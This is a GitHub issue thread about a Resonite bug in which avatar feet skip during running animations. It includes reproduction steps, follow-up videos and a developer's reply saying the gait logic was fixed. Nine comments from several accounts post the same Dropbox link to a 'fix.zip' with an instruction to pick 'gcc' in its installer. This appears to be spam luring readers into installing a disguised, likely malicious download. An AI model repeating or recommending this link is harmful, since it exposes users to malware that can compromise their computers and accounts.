### ISSUE TITLE
Two feet will go at once randomly when running

### ISSUE THREAD

**Issue by jae1911** [Yellow-Dog-Man/Resonite-Issues#2816]
### Describe the issue.

When running or sprinting, randomly, two feet instead of one will move, skipping the animation.
At lower speeds like walking, the animation behaves as it should.

Despite trying to tweak the `LocomotionAnimationConfiguration` component, none of the values I tried fix this issue. I also tried other user's configurations of this component and the issue remains.

### To Reproduce

1. Equip avatar
2. Run or sprint
3. Observe the feet will skip every now and then

Alternatively

1. Equip avatar
2. Open user root
4. Scroll to `UserPoseController`
5. Activate `RenderDebugVisuals` (Optional)
6. Set `OverrideLocomotionVelocity` to `0,0,1`
7. Observe the animation is fine
8. Set `OverrideLocomotionVelocity` to `0,0,3.5`
9. Observe the animation skips randomly
10. Set `OverrideLocomotionVelocity` to `0,0,8`
11. Observe the animation skips randomly

### Expected behavior

Feet shouldn't skip randomly and instead the animation should be used.

### Screenshots

See https://youtu.be/kXGnwsj1lms

### Resonite Version Number

Beta 2024.8.22.1328

### What Platforms does this occur on?

Windows

### What headset if any do you use?

Desktop

### Log Files

[TETHYS - 2024.8.22.1328 - 2024-08-26 02_48_49.log](https://github.com/user-attachments/files/16742657/TETHYS.-.2024.8.22.1328.-.2024-08-26.02_48_49.log)

### Additional Context

Given this happens with my avatar, if needed for reproductions, I can send a copy of it over (though of course, some restrictions apply).

I tested and reproduced using the following avatars:
- `Jae_rex_cust.gltf` (my main avatar shown in the video, slightly modified Rexouium 1.5 to remove some meshes)
- `boykisser public 1.1 (ext arms and face tracking)` (random avatar I have in my inventory)
- `Minecraft Avali` (by Yosh)

### Reporters

U-j4 | j4.lc (Discord)

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Frooxius** [comment]
Can you give me a timestamp of where this happens in the video? I watched a chunk of it, but it's not fully clear when this is happening.

**Comment by jae1911** [comment]
To make it clearer, I made other recordings of what I see with some avatars with a simulated speed of 3.5.

With a modified Rexouium:

https://github.com/user-attachments/assets/56aeefaa-0f71-40af-b31f-8461338708c7

Boykisser:

https://github.com/user-attachments/assets/3dd758cf-c4ae-4d2a-9529-4264321570a7

Untouched, freshly imported Rexouium:

https://github.com/user-attachments/assets/281d223f-a6ee-47d2-a02b-d41c98348928

You can see it particularly well, sometimes, during the running animation, it's like both feet will try to go forward too fast and then slide back together, it's especially visible on the third video, at the very beginning. The faster the avatar goes, the more visible it is.

Not sure if it's something wrong with my game or the avatars I tested, but some of them are completely untouched after import (for instance, the third one).

**Comment by Frooxius** [comment]
I fixed this with 2024.8.28.1308! Turns out the logic for feet movement was wrong, so it wasn't just jumping either, but overall the gait could become destabilized. 

Should behave much better with this build, thanks for report!
